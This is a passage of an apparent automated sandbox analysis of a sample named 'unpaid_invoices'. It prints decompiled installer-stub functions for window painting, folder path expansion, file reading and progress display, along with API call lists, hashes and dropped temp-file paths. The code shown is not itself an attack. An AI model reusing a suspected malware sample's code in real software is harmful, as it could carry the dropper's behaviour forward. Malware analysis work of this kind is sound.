              					_v32.bottom = _v32.bottom & 0x00000000;
              					while(_v32.top < _t126) {
              						_a12 = _t126 - _v32.top;
              						asm("cdq");
              						asm("cdq");
              						asm("cdq");
              						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
              						_t87 = CreateBrushIndirect( &_v16);
              						_v32.bottom = _v32.bottom + 4;
              						_a16 = _t87;
              						FillRect(_a8,  &_v32, _t87);
              						DeleteObject(_a16);
              						_v32.top = _v32.top + 4;
              					}
              					if( *(_t130 + 0x58) != 0xffffffff) {
              						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
              						_a16 = _t94;
              						if(_t94 != 0) {
              							_t128 = _a8;
              							_v32.left = 0x10;
              							_v32.top = 8;
              							SetBkMode(_t128, 1);
              							SetTextColor(_t128,  *(_t130 + 0x58));
              							_a8 = SelectObject(_t128, _a16);
              							DrawTextW(_t128, 0x7a7aa0, 0xffffffff,  &_v32, 0x820);
              							SelectObject(_t128, _a8);
              							DeleteObject(_a16);
              						}
              					}
              					EndPaint(_a4,  &_v96);
              					return 0;
              				}
              				_t102 = _a16;
              				if(_a8 == 0x46) {
              					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
              					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8aa8;
              				}
              				return DefWindowProcW(_a4, _a8, _a12, _t102);
              			}














              APIs
              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
              • BeginPaint.USER32(?,?), ref: 00401047
              • GetClientRect.USER32 ref: 0040105B
              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
              • FillRect.USER32 ref: 004010E4
              • DeleteObject.GDI32(?), ref: 004010ED
              • CreateFontIndirectW.GDI32(?), ref: 00401105
              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
              • SelectObject.GDI32(00000000,?), ref: 00401140
              • DrawTextW.USER32(00000000,007A7AA0,000000FF,00000010,00000820), ref: 00401156
              • SelectObject.GDI32(00000000,00000000), ref: 00401160
              • DeleteObject.GDI32(?), ref: 00401165
              • EndPaint.USER32(?,?), ref: 0040116E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
              • String ID: F
              • API String ID: 941294808-1304234792
              • Opcode ID: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
              • Instruction ID: 97a6e5849d711934decb320d9e1447055a7c39d586dd296ee09aa65e352ff849
              • Opcode Fuzzy Hash: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
              • Instruction Fuzzy Hash: 83418C71800209AFCF058F95CE459AF7BB9FF45315F00802AF991AA1A0CB389A55DFA4
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 72%
              			E004066AB(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
              				struct _ITEMIDLIST* _v8;
              				signed int _v12;
              				signed int _v16;
              				signed int _v20;
              				signed int _v24;
              				signed int _v28;
              				signed int _t44;
              				WCHAR* _t45;
              				signed char _t47;
              				signed int _t48;
              				short _t59;
              				short _t61;
              				short _t63;
              				void* _t71;
              				signed int _t77;
              				signed int _t78;
              				short _t81;
              				short _t82;
              				signed char _t84;
              				signed int _t85;
              				void* _t98;
              				void* _t104;
              				intOrPtr* _t105;
              				void* _t107;
              				WCHAR* _t108;
              				void* _t110;
              
              				_t107 = __esi;
              				_t104 = __edi;
              				_t71 = __ebx;
              				_t44 = _a8;
              				if(_t44 < 0) {
              					_t44 =  *( *0x7a7a7c - 4 + _t44 * 4);
              				}
              				_push(_t71);
              				_push(_t107);
              				_push(_t104);
              				_t105 =  *0x7a8ad8 + _t44 * 2;
              				_t45 = 0x7a6a40;
              				_t108 = 0x7a6a40;
              				if(_a4 >= 0x7a6a40 && _a4 - 0x7a6a40 >> 1 < 0x800) {
              					_t108 = _a4;
              					_a4 = _a4 & 0x00000000;
              				}
              				_t81 =  *_t105;
              				_a8 = _t81;
              				if(_t81 == 0) {
              					L43:
              					 *_t108 =  *_t108 & 0x00000000;
              					if(_a4 == 0) {
              						return _t45;
              					}
              					return E0040666E(_a4, _t45);
              				} else {
              					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
              						_t98 = 2;
              						_t105 = _t105 + _t98;
              						if(_t81 >= 4) {
              							if(__eflags != 0) {
              								 *_t108 = _t81;
              								_t108 = _t108 + _t98;
              								__eflags = _t108;
              							} else {
              								 *_t108 =  *_t105;
              								_t108 = _t108 + _t98;
              								_t105 = _t105 + _t98;
              							}
              							L42:
              							_t82 =  *_t105;
              							_a8 = _t82;
              							if(_t82 != 0) {
              								_t81 = _a8;
              								continue;
              							}
              							goto L43;
              						}
              						_t84 =  *((intOrPtr*)(_t105 + 1));
              						_t47 =  *_t105;
              						_t48 = _t47 & 0x000000ff;
              						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
              						_t85 = _t84 & 0x000000ff;
              						_v28 = _t48 | 0x00008000;
              						_t77 = 2;
              						_v16 = _t85;
              						_t105 = _t105 + _t77;
              						_v24 = _t48;
              						_v20 = _t85 | 0x00008000;
              						if(_a8 != _t77) {
              							__eflags = _a8 - 3;
              							if(_a8 != 3) {
              								__eflags = _a8 - 1;
              								if(__eflags == 0) {
              									__eflags = (_t48 | 0xffffffff) - _v12;
              									E004066AB(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
              								}
              								L38:
              								_t108 =  &(_t108[lstrlenW(_t108)]);
              								_t45 = 0x7a6a40;
              								goto L42;
              							}
              							_t78 = _v12;
              							__eflags = _t78 - 0x1d;
              							if(_t78 != 0x1d) {
              								__eflags = (_t78 << 0xb) + 0x7a9000;
              								E0040666E(_t108, (_t78 << 0xb) + 0x7a9000);
              							} else {
              								E004065B5(_t108,  *0x7a8aa8);
              							}
              							__eflags = _t78 + 0xffffffeb - 7;
              							if(__eflags < 0) {
              								L29:
              								E004068F5(_t108);
              							}
              							goto L38;
              						}
              						if( *0x7a8b24 != 0) {
              							_t77 = 4;
              						}
              						_t121 = _t48;
              						if(_t48 >= 0) {
              							__eflags = _t48 - 0x25;
              							if(_t48 != 0x25) {
              								__eflags = _t48 - 0x24;
              								if(_t48 == 0x24) {
              									GetWindowsDirectoryW(_t108, 0x400);
              									_t77 = 0;
              								}
              								while(1) {
              									__eflags = _t77;
              									if(_t77 == 0) {
              										goto L26;
              									}
              									_t59 =  *0x7a8aa4;
              									_t77 = _t77 - 1;
              									__eflags = _t59;
              									if(_t59 == 0) {
              										L22:
              										_t61 = SHGetSpecialFolderLocation( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
              										__eflags = _t61;
              										if(_t61 != 0) {
              											L24:
              											 *_t108 =  *_t108 & 0x00000000;
              											__eflags =  *_t108;
              											continue;
              										}
              										__imp__SHGetPathFromIDListW(_v8, _t108);
              										_a8 = _t61;
              										__imp__CoTaskMemFree(_v8);
              										__eflags = _a8;
              										if(_a8 != 0) {
              											goto L26;
              										}
              										goto L24;
              									}
              									_t63 =  *_t59( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
              									__eflags = _t63;
              									if(_t63 == 0) {
              										goto L26;
              									}
              									goto L22;
              								}
              								goto L26;
              							}
              							GetSystemDirectoryW(_t108, 0x400);
              							goto L26;
              						} else {
              							E0040653C( *0x7a8ad8, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8ad8 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
              							if( *_t108 != 0) {
              								L27:
              								if(_v16 == 0x1a) {
              									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
              								}
              								goto L29;
              							}
              							E004066AB(_t77, _t105, _t108, _t108, _v16);
              							L26:
              							if( *_t108 == 0) {
              								goto L29;
              							}
              							goto L27;
              						}
              					}
              					goto L43;
              				}
              			}

              APIs
              • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,00000400), ref: 004067C6
              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,00000400,00000000,007A0F68,?,00405707,007A0F68,00000000,00000000,00000000,00000000), ref: 004067D9
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Directory$SystemWindowslstrcatlstrlen
              • String ID: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
              • API String ID: 4260037668-2589404401
              • Opcode ID: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
              • Instruction ID: c9eaf07520507b798c7259a568fd9567d3c8f5a418c476a208567326fda18bee
              • Opcode Fuzzy Hash: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
              • Instruction Fuzzy Hash: F061FF72902115AADF10AF68CC40BAE37A5AF55314F22C03FE947B62D0DB3D49A5CB89
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00404631(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
              				struct tagLOGBRUSH _v16;
              				long _t39;
              				long _t41;
              				void* _t44;
              				signed char _t50;
              				long* _t54;
              
              				if(_a4 + 0xfffffecd > 5) {
              					L18:
              					return 0;
              				}
              				_t54 = GetWindowLongW(_a12, 0xffffffeb);
              				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
              					goto L18;
              				} else {
              					_t50 = _t54[5];
              					if((_t50 & 0xffffffe0) != 0) {
              						goto L18;
              					}
              					_t39 =  *_t54;
              					if((_t50 & 0x00000002) != 0) {
              						_t39 = GetSysColor(_t39);
              					}
              					if((_t54[5] & 0x00000001) != 0) {
              						SetTextColor(_a8, _t39);
              					}
              					SetBkMode(_a8, _t54[4]);
              					_t41 = _t54[1];
              					_v16.lbColor = _t41;
              					if((_t54[5] & 0x00000008) != 0) {
              						_t41 = GetSysColor(_t41);
              						_v16.lbColor = _t41;
              					}
              					if((_t54[5] & 0x00000004) != 0) {
              						SetBkColor(_a8, _t41);
              					}
              					if((_t54[5] & 0x00000010) != 0) {
              						_v16.lbStyle = _t54[2];
              						_t44 = _t54[3];
              						if(_t44 != 0) {
              							DeleteObject(_t44);
              						}
              						_t54[3] = CreateBrushIndirect( &_v16);
              					}
              					return _t54[3];
              				}
              			}

              APIs
              • GetWindowLongW.USER32(?,000000EB), ref: 0040464E
              • GetSysColor.USER32(00000000), ref: 0040468C
              • SetTextColor.GDI32(?,00000000), ref: 00404698
              • SetBkMode.GDI32(?,?), ref: 004046A4
              • GetSysColor.USER32(?), ref: 004046B7
              • SetBkColor.GDI32(?,?), ref: 004046C7
              • DeleteObject.GDI32(?), ref: 004046E1
              • CreateBrushIndirect.GDI32(?), ref: 004046EB
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
              • String ID:
              • API String ID: 2320649405-0
              • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
              • Instruction ID: 80d2dfdfbb5be5877469216c844a522b7394a6fa1e0a99176855ee87e7478973
              • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
              • Instruction Fuzzy Hash: EC2179B15007049BC730DF68D908B5BBBF8AF41714F048E2EE9D6A26E1E739D944DB68
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 87%
              			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
              				intOrPtr _t65;
              				intOrPtr _t66;
              				intOrPtr _t72;
              				void* _t76;
              				void* _t79;
              
              				_t72 = __edx;
              				 *((intOrPtr*)(_t76 - 8)) = __ebx;
              				_t65 = 2;
              				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
              				_t66 = E00402D84(_t65);
              				_t79 = _t66 - 1;
              				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
              				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
              				if(_t79 < 0) {
              					L36:
              					 *0x7a8b28 =  *0x7a8b28 +  *(_t76 - 4);
              				} else {
              					__ecx = 0x3ff;
              					if(__eax > 0x3ff) {
              						 *(__ebp - 0x44) = 0x3ff;
              					}
              					if( *__edi == __bx) {
              						L34:
              						__ecx =  *(__ebp - 0xc);
              						__eax =  *(__ebp - 8);
              						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
              						if(_t79 == 0) {
              							 *(_t76 - 4) = 1;
              						}
              						goto L36;
              					} else {
              						 *(__ebp - 0x38) = __ebx;
              						 *(__ebp - 0x18) = E004065CE(__ecx, __edi);
              						if( *(__ebp - 0x44) > __ebx) {
              							do {
              								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
              									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040623F( *(__ebp - 0x18), __ebx) >= 0) {
              										__eax = __ebp - 0x50;
              										if(E004061E1( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
              											goto L34;
              										} else {
              											goto L21;
              										}
              									} else {
              										goto L34;
              									}
              								} else {
              									__eax = __ebp - 0x40;
              									_push(__ebx);
              									_push(__ebp - 0x40);
              									__eax = 2;
              									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
              									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
              									if(__eax == 0) {
              										goto L34;
              									} else {
              										__ecx =  *(__ebp - 0x40);
              										if(__ecx == __ebx) {
              											goto L34;
              										} else {
              											__ax =  *(__ebp + 0xa) & 0x000000ff;
              											 *(__ebp - 0x4c) = __ecx;
              											 *(__ebp - 0x50) = __eax;
              											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
              												L28:
              												__ax & 0x0000ffff = E004065B5( *(__ebp - 0xc), __ax & 0x0000ffff);
              											} else {
              												__ebp - 0x50 = __ebp + 0xa;
              												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
              													L21:
              													__eax =  *(__ebp - 0x50);
              												} else {
              													__edi =  *(__ebp - 0x4c);
              													__edi =  ~( *(__ebp - 0x4c));
              													while(1) {
              														_t22 = __ebp - 0x40;
              														 *_t22 =  *(__ebp - 0x40) - 1;
              														__eax = 0xfffd;
              														 *(__ebp - 0x50) = 0xfffd;
              														if( *_t22 == 0) {
              															goto L22;
              														}
              														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
              														__edi = __edi + 1;
              														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
              														__eax = __ebp + 0xa;
              														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
              															continue;
              														} else {
              															goto L21;
              														}
              														goto L22;
              													}
              												}
              												L22:
              												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
              													goto L28;
              												} else {
              													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
              														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
              															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
              															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
              														} else {
              															__ecx =  *(__ebp - 0xc);
              															__edx =  *(__ebp - 8);
              															 *(__ebp - 8) =  *(__ebp - 8) + 1;
              															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
              														}
              														goto L34;
              													} else {
              														__ecx =  *(__ebp - 0xc);
              														__edx =  *(__ebp - 8);
              														 *(__ebp - 8) =  *(__ebp - 8) + 1;
              														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
              														 *(__ebp - 0x38) = __eax;
              														if(__ax == __bx) {
              															goto L34;
              														} else {
              															goto L26;
              														}
              													}
              												}
              											}
              										}
              									}
              								}
              								goto L37;
              								L26:
              								__eax =  *(__ebp - 8);
              							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
              						}
              						goto L34;
              					}
              				}
              				L37:
              				return 0;
              			}

              APIs
              • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                • Part of subcall function 0040623F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D1,00000000,00000000,?,00000000,00000011), ref: 00406255
              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: File$Pointer$ByteCharMultiWide$Read
              • String ID: 9
              • API String ID: 163830602-2366072709
              • Opcode ID: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
              • Instruction ID: 3e360b617c3737f2e779930334e882a7207aef4f73e2c1e076e29b282e1bb3de
              • Opcode Fuzzy Hash: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
              • Instruction Fuzzy Hash: 60510B75D00219ABDF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004056D0(signed int _a4, WCHAR* _a8) {
              				struct HWND__* _v8;
              				signed int _v12;
              				WCHAR* _v32;
              				long _v44;
              				int _v48;
              				void* _v52;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				WCHAR* _t27;
              				signed int _t28;
              				long _t29;
              				signed int _t37;
              				signed int _t38;
              
              				_t27 =  *0x7a7a84;
              				_v8 = _t27;
              				if(_t27 != 0) {
              					_t37 =  *0x7a8b54;
              					_v12 = _t37;
              					_t38 = _t37 & 0x00000001;
              					if(_t38 == 0) {
              						E004066AB(_t38, 0, 0x7a0f68, 0x7a0f68, _a4);
              					}
              					_t27 = lstrlenW(0x7a0f68);
              					_a4 = _t27;
              					if(_a8 == 0) {
              						L6:
              						if((_v12 & 0x00000004) == 0) {
              							_t27 = SetWindowTextW( *0x7a7a68, 0x7a0f68);
              						}
              						if((_v12 & 0x00000002) == 0) {
              							_v32 = 0x7a0f68;
              							_v52 = 1;
              							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
              							_v44 = 0;
              							_v48 = _t29 - _t38;
              							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
              							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
              						}
              						if(_t38 != 0) {
              							_t28 = _a4;
              							0x7a0f68[_t28] = 0;
              							return _t28;
              						}
              					} else {
              						_t27 = lstrlenW(_a8) + _a4;
              						if(_t27 < 0x1000) {
              							_t27 = lstrcatW(0x7a0f68, _a8);
              							goto L6;
              						}
              					}
              				}
              				return _t27;
              			}

              APIs
              • lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
              • lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
              • lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
              • SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                • Part of subcall function 004066AB: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
                • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: MessageSendlstrlen$lstrcat$TextWindow
              • String ID:
              • API String ID: 1495540970-0
              • Opcode ID: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
              • Instruction ID: b1df74b24ef97eccf04675f52fbaffa54a328febca5869b92639b2b84e823bb6
              • Opcode Fuzzy Hash: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
              • Instruction Fuzzy Hash: 32219D71900518FACF119FA5DD84ACFBFB8EF85350F10842AF904B6290C7794A40DFA8
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 91%
              			E004068F5(WCHAR* _a4) {
              				short _t5;
              				short _t7;
              				WCHAR* _t19;
              				WCHAR* _t20;
              				WCHAR* _t21;
              
              				_t20 = _a4;
              				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
              					_t20 =  &(_t20[4]);
              				}
              				if( *_t20 != 0 && E00405FB4(_t20) != 0) {
              					_t20 =  &(_t20[2]);
              				}
              				_t5 =  *_t20;
              				_t21 = _t20;
              				_t19 = _t20;
              				if(_t5 != 0) {
              					do {
              						if(_t5 > 0x1f &&  *((short*)(E00405F6A(L"*?|<>/\":", _t5))) == 0) {
              							E00406119(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
              							_t19 = CharNextW(_t19);
              						}
              						_t20 = CharNextW(_t20);
              						_t5 =  *_t20;
              					} while (_t5 != 0);
              				}
              				 *_t19 =  *_t19 & 0x00000000;
              				while(1) {
              					_push(_t19);
              					_push(_t21);
              					_t19 = CharPrevW();
              					_t7 =  *_t19;
              					if(_t7 != 0x20 && _t7 != 0x5c) {
              						break;
              					}
              					 *_t19 =  *_t19 & 0x00000000;
              					if(_t21 < _t19) {
              						continue;
              					}
              					break;
              				}
              				return _t7;
              			}









              APIs
              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406958
              • CharNextW.USER32(?,?,?,00000000,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406967
              • CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040696C
              • CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040697F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Char$Next$Prev
              • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
              • API String ID: 589700163-4010320282
              • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
              • Instruction ID: be6858c8d4b602c62de40fdc636a35535680886f1e3ed17f643e47e9e10769a1
              • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
              • Instruction Fuzzy Hash: 0D11E6A580060295DB302B148C40A7762E8AF94750F12403FE98AB36C1E7BC4CA2C6BD
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E0040302E(intOrPtr _a4) {
              				short _v132;
              				long _t6;
              				struct HWND__* _t7;
              				struct HWND__* _t15;
              
              				if(_a4 != 0) {
              					_t15 =  *0x79f73c;
              					if(_t15 != 0) {
              						_t15 = DestroyWindow(_t15);
              					}
              					 *0x79f73c = 0;
              					return _t15;
              				}
              				if( *0x79f73c != 0) {
              					return E00406A77(0);
              				}
              				_t6 = GetTickCount();
              				if(_t6 >  *0x7a8aac) {
              					if( *0x7a8aa8 == 0) {
              						_t7 = CreateDialogParamW( *0x7a8aa0, 0x6f, 0, E00402F93, 0);
              						 *0x79f73c = _t7;
              						return ShowWindow(_t7, 5);
              					}
              					if(( *0x7a8b54 & 0x00000001) != 0) {
              						wsprintfW( &_v132, L"... %d%%", E00403012());
              						return E004056D0(0,  &_v132);
              					}
              				}
              				return _t6;
              			}








              APIs
              • DestroyWindow.USER32(?,00000000), ref: 00403049
              • GetTickCount.KERNEL32 ref: 00403067
              • wsprintfW.USER32 ref: 00403095
                • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                • Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
                • Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
                • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
              • CreateDialogParamW.USER32 ref: 004030B9
              • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
              • String ID: ... %d%%
              • API String ID: 722711167-2449383134
              • Opcode ID: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
              • Instruction ID: 36a9105e1bf518e5a00a94211bbaadb265df24d4843d4ed97aac6270594080be
              • Opcode Fuzzy Hash: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
              • Instruction Fuzzy Hash: 40015B70413610ABC7217FA0AD49A9A7FACAB01B06F50853BF441F25E9DA7C46458B9E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00404F85(struct HWND__* _a4, intOrPtr _a8) {
              				long _v8;
              				signed char _v12;
              				unsigned int _v16;
              				void* _v20;
              				intOrPtr _v24;
              				long _v56;
              				void* _v60;
              				long _t15;
              				unsigned int _t19;
              				signed int _t25;
              				struct HWND__* _t28;
              
              				_t28 = _a4;
              				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
              				if(_a8 == 0) {
              					L4:
              					_v56 = _t15;
              					_v60 = 4;
              					SendMessageW(_t28, 0x113e, 0,  &_v60);
              					return _v24;
              				}
              				_t19 = GetMessagePos();
              				_v16 = _t19 >> 0x10;
              				_v20 = _t19;
              				ScreenToClient(_t28,  &_v20);
              				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
              				if((_v12 & 0x00000066) != 0) {
              					_t15 = _v8;
              					goto L4;
              				}
              				return _t25 | 0xffffffff;
              			}















              APIs
              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FA0
